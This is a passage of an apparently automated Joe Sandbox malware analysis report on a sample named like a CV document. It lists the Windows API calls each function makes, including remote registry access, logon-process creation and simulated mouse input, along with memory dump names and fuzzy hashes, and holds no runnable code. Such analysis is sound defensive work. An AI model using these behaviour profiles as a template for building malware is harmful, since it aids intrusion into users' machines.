                                                                                        • Instruction Fuzzy Hash: 9E516E715043409FD722EF64CC85EABB7E8EF88754F00492EF5869B291DB70D904CB92
                                                                                        APIs
                                                                                          • Part of subcall function 003E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003E2BB5,?,?), ref: 003E3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E30AF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E30EF
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003E3112
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003E313B
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003E317E
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003E318B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                        • String ID:
                                                                                        • API String ID: 3451389628-0
                                                                                        • Opcode ID: 1a9e7a3957dd3c54c49299808229c8b919474381192ea8d4d89329740cc1ed14
                                                                                        • Instruction ID: c54a85855cb704cf2168f0a2966a84afacef58e63cc2473a2075d7c20912a916
                                                                                        • Opcode Fuzzy Hash: 1a9e7a3957dd3c54c49299808229c8b919474381192ea8d4d89329740cc1ed14
                                                                                        • Instruction Fuzzy Hash: 75516931508340AFC702EF64CC95EAABBE9FF88304F04495DF5559B2A1DB71EA09CB52
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 003E8540
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 003E8577
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003E859F
                                                                                        • GetMenuItemID.USER32(?,?), ref: 003E860E
                                                                                        • GetSubMenu.USER32(?,?), ref: 003E861C
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 003E866D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: 1528b39af82fe73cf124dac31bdfb8d70da715f90069109664e4e528f2ca1d3c
                                                                                        • Instruction ID: 9ba5450e11d6118cbe769d6a2db32bf94ad7a59d907e4023f8a9647abdbe8f3e
                                                                                        • Opcode Fuzzy Hash: 1528b39af82fe73cf124dac31bdfb8d70da715f90069109664e4e528f2ca1d3c
                                                                                        • Instruction Fuzzy Hash: 32518035E00625AFCF12EF95C941AAEB7F4EF48310F1145A9E919BB391CB70AE418B94
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C4B10
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C4B5B
                                                                                        • IsMenu.USER32(00000000), ref: 003C4B7B
                                                                                        • CreatePopupMenu.USER32 ref: 003C4BAF
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 003C4C0D
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003C4C3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: 766b66b937175bb7354684f5b8b61746d7eb4b9edf0ec7415b9d98b033c284a1
                                                                                        • Instruction ID: eb7025bde1cebda32a0ad5f2e73a231a247ae6cb494f2d345d45e1f978656c98
                                                                                        • Opcode Fuzzy Hash: 766b66b937175bb7354684f5b8b61746d7eb4b9edf0ec7415b9d98b033c284a1
                                                                                        • Instruction Fuzzy Hash: 0B51CE70A01209EBDF26CFA8C998FADBBF4AF44318F14816DE855DB2A1E3709D44CB51
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0041DC00), ref: 003D8E7C
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8E89
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 003D8EAD
                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 003D8EC5
                                                                                        • _strlen.LIBCMT ref: 003D8EF7
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8F6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_strlenselect
                                                                                        • String ID:
                                                                                        • API String ID: 2217125717-0
                                                                                        • Opcode ID: 14d8e3cf8e511f1c2166b46bbd5080121d47ac51dba7b05934fe32c713c96297
                                                                                        • Instruction ID: 678f2961fb1abd20e611363566c9035c7cb2f04fdcc6e9fccd12c3e65417fd37
                                                                                        • Opcode Fuzzy Hash: 14d8e3cf8e511f1c2166b46bbd5080121d47ac51dba7b05934fe32c713c96297
                                                                                        • Instruction Fuzzy Hash: 8B418772900204AFCB16EBA4DD95EAEB7BDEF48314F10459AF5169B2D1DF30AE44CB60
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • BeginPaint.USER32(?,?,?), ref: 0039AC2A
                                                                                        • GetWindowRect.USER32(?,?), ref: 0039AC8E
                                                                                        • ScreenToClient.USER32(?,?), ref: 0039ACAB
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0039ACBC
                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 0039AD06
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003FE673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 2592858361-0
                                                                                        • Opcode ID: 36c62b65d20d5aec419a2836ea2f5a37801dff0eb18893e9ea30ebb33ce413e2
                                                                                        • Instruction ID: bfe6c6eb86eebb0fd12d43185aecc0423be7deff7c9bdc75d1f0b97b2adbbd9c
                                                                                        • Opcode Fuzzy Hash: 36c62b65d20d5aec419a2836ea2f5a37801dff0eb18893e9ea30ebb33ce413e2
                                                                                        • Instruction Fuzzy Hash: 7B41D2715047049FDB12DF24DC84F7A7BA8EB59320F040729FAA4CB2B1C7319884DBA2
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00441628,00000000,00441628,00000000,00000000,00441628,?,003FDC5D,00000000,?,00000000,00000000,00000000,?,003FDAD1,00000004), ref: 003EE40B
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 003EE42F
                                                                                        • ShowWindow.USER32(00441628,00000000), ref: 003EE48F
                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 003EE4A1
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 003EE4C5
                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003EE4E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: e64f32baee13dd661761adf9f9756f69ac56baa5ce707d45caef7938ad8fd069
                                                                                        • Instruction ID: 6b988e85c720339f53b79078a61027de17cb0796356d5ad0689496f2e6646f29
                                                                                        • Opcode Fuzzy Hash: e64f32baee13dd661761adf9f9756f69ac56baa5ce707d45caef7938ad8fd069
                                                                                        • Instruction Fuzzy Hash: 6B4171306015A0EFDB22CF66C599B947BE1BF09304F5942B9EA589F2E2C731A846CF51
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 003C98D1
                                                                                          • Part of subcall function 0039F4EA: std::exception::exception.LIBCMT ref: 0039F51E
                                                                                          • Part of subcall function 0039F4EA: __CxxThrowException@8.LIBCMT ref: 0039F533
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003C9908
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 003C9924
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 003C999E
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003C99B3
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C99D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 2537439066-0
                                                                                        • Opcode ID: d747741c575ea269e7dfbe8a3cb5e50c8d85a76e3174c30f7339bcd4570c7966
                                                                                        • Instruction ID: df6708109a6b7efaf1c21cb6f314e233fbf0a83db27981dfd5675e1d59d79f09
                                                                                        • Opcode Fuzzy Hash: d747741c575ea269e7dfbe8a3cb5e50c8d85a76e3174c30f7339bcd4570c7966
                                                                                        • Instruction Fuzzy Hash: 36316D31900205EBDF01AFA5DD89EAAB778FF45310B1580B9E905EA246DB70DE14DBA4
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,003D77F4,?,?,00000000,00000001), ref: 003D9B53
                                                                                          • Part of subcall function 003D6544: GetWindowRect.USER32(?,?), ref: 003D6557
                                                                                        • GetDesktopWindow.USER32 ref: 003D9B7D
                                                                                        • GetWindowRect.USER32(00000000), ref: 003D9B84
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003D9BB6
                                                                                          • Part of subcall function 003C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7AD0
                                                                                        • GetCursorPos.USER32(?), ref: 003D9BE2
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003D9C44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: 5131daa32cc18c1153aae8d29088d68e7fd8dc77508981dd05be691b18d1343b
                                                                                        • Instruction ID: b1e7980b89b50ed30b1d5148454a962d5e7ec5019633fd1f9494ddf82af9bbb5
                                                                                        • Opcode Fuzzy Hash: 5131daa32cc18c1153aae8d29088d68e7fd8dc77508981dd05be691b18d1343b
                                                                                        • Instruction Fuzzy Hash: A331C072504305ABC710DF68EC49F9AB7E9FF89314F01092BF995E7281D671E908CB91
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003BAFAE
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 003BAFB5
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003BAFC4
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 003BAFCF
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BAFFE
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 003BB012
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: 5fe55f7758814fd14febd6eb845dcc4287cd8baefc43d8d63f90ee9a0cb3db51
                                                                                        • Instruction ID: 54a79dee9bcd70cfaea99a4fc1754e849d3680dc6aceacf199a337cf53e5fa66
                                                                                        • Opcode Fuzzy Hash: 5fe55f7758814fd14febd6eb845dcc4287cd8baefc43d8d63f90ee9a0cb3db51
                                                                                        • Instruction Fuzzy Hash: 6E2149B2504A09ABDB029FA4DE09BEE7BA9AB44308F054025FA01A6561C376DD25EB61
                                                                                        APIs
                                                                                          • Part of subcall function 0039AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0039AFE3
                                                                                          • Part of subcall function 0039AF83: SelectObject.GDI32(?,00000000), ref: 0039AFF2
                                                                                          • Part of subcall function 0039AF83: BeginPath.GDI32(?), ref: 0039B009
                                                                                          • Part of subcall function 0039AF83: SelectObject.GDI32(?,00000000), ref: 0039B033
                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003EEC20
                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 003EEC34
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003EEC42
                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 003EEC52
                                                                                        • EndPath.GDI32(00000000), ref: 003EEC62
                                                                                        • StrokePath.GDI32(00000000), ref: 003EEC72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: a5bd7c89049c2708934cf1a00b3b890ab6853b459036e19013ff73bf53562727
                                                                                        • Instruction ID: bc1e3bd65101ceafdbeb7055ffb232de7b42b85fbe2a3bac318b94cdb33988e1
                                                                                        • Opcode Fuzzy Hash: a5bd7c89049c2708934cf1a00b3b890ab6853b459036e19013ff73bf53562727
                                                                                        • Instruction Fuzzy Hash: 6811097640015DBFEF029F90DD88EEA7F6DEB08354F048122FE0999160D7719D59DBA4
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 003BE1C0
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 003BE1D1
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003BE1D8
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 003BE1E0
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003BE1F7
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 003BE209
                                                                                          • Part of subcall function 003B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,003B9A05,00000000,00000000,?,003B9DDB), ref: 003BA53A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                        • String ID:
                                                                                        • API String ID: 603618608-0
                                                                                        • Opcode ID: c4162443daa25568e082e164997911cbc76e533f64d64b5ff426da8a8a282bc9
                                                                                        • Instruction ID: 77c5e1128748b966dc9c3d8243ad4f6f98d5ecde3df6ba8c6e5102f2d5622812
                                                                                        • Opcode Fuzzy Hash: c4162443daa25568e082e164997911cbc76e533f64d64b5ff426da8a8a282bc9
                                                                                        • Instruction Fuzzy Hash: F40184B5E00214BFEB109BE5CD45F9EBFB8EB48355F004066EA04AB290D6719C00CBA0
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 003A7B47
                                                                                          • Part of subcall function 003A123A: __initp_misc_winsig.LIBCMT ref: 003A125E
                                                                                          • Part of subcall function 003A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003A7F51
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003A7F65
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003A7F78
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003A7F8B
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003A7F9E
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003A7FB1
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003A7FC4
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003A7FD7
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003A7FEA
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003A7FFD
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003A8010
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003A8023
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003A8036
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003A8049
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003A805C
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003A806F
                                                                                        • __mtinitlocks.LIBCMT ref: 003A7B4C
                                                                                          • Part of subcall function 003A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0043AC68,00000FA0,?,?,003A7B51,003A5E77,00436C70,00000014), ref: 003A7E41
                                                                                        • __mtterm.LIBCMT ref: 003A7B55
                                                                                          • Part of subcall function 003A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003A7B5A,003A5E77,00436C70,00000014), ref: 003A7D3F
                                                                                          • Part of subcall function 003A7BBD: _free.LIBCMT ref: 003A7D46
                                                                                          • Part of subcall function 003A7BBD: DeleteCriticalSection.KERNEL32(0043AC68,?,?,003A7B5A,003A5E77,00436C70,00000014), ref: 003A7D68
                                                                                        • __calloc_crt.LIBCMT ref: 003A7B7A
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003A7BA3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 2942034483-0
                                                                                        • Opcode ID: 707b5aac247f77e7cb49a6083a150b1c2cbfcb30062283464722cac06e3ff8b3
                                                                                        • Instruction ID: 4a8ec92ab20a5665c6ca0d713c14747d13fdc7e5a1ea1aeef667d8dad8a7cb33
                                                                                        • Opcode Fuzzy Hash: 707b5aac247f77e7cb49a6083a150b1c2cbfcb30062283464722cac06e3ff8b3
                                                                                        • Instruction Fuzzy Hash: BBF0907250D31219EA2B77747C8BA8B2794DF03730F2506A9F8A0DD1D2FF25884141B4
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0038281D
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00382825
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00382830
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0038283B
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00382843
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038284B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: ca3a1477a98989d72d067cabce248be6c35d39c4d4a5ee07d70abb77e4af3ec9
                                                                                        • Instruction ID: 5bf9556f4e2e7169e6dc6429159f45bf52f4998ea16a72553a738b958f81270c
                                                                                        • Opcode Fuzzy Hash: ca3a1477a98989d72d067cabce248be6c35d39c4d4a5ee07d70abb77e4af3ec9
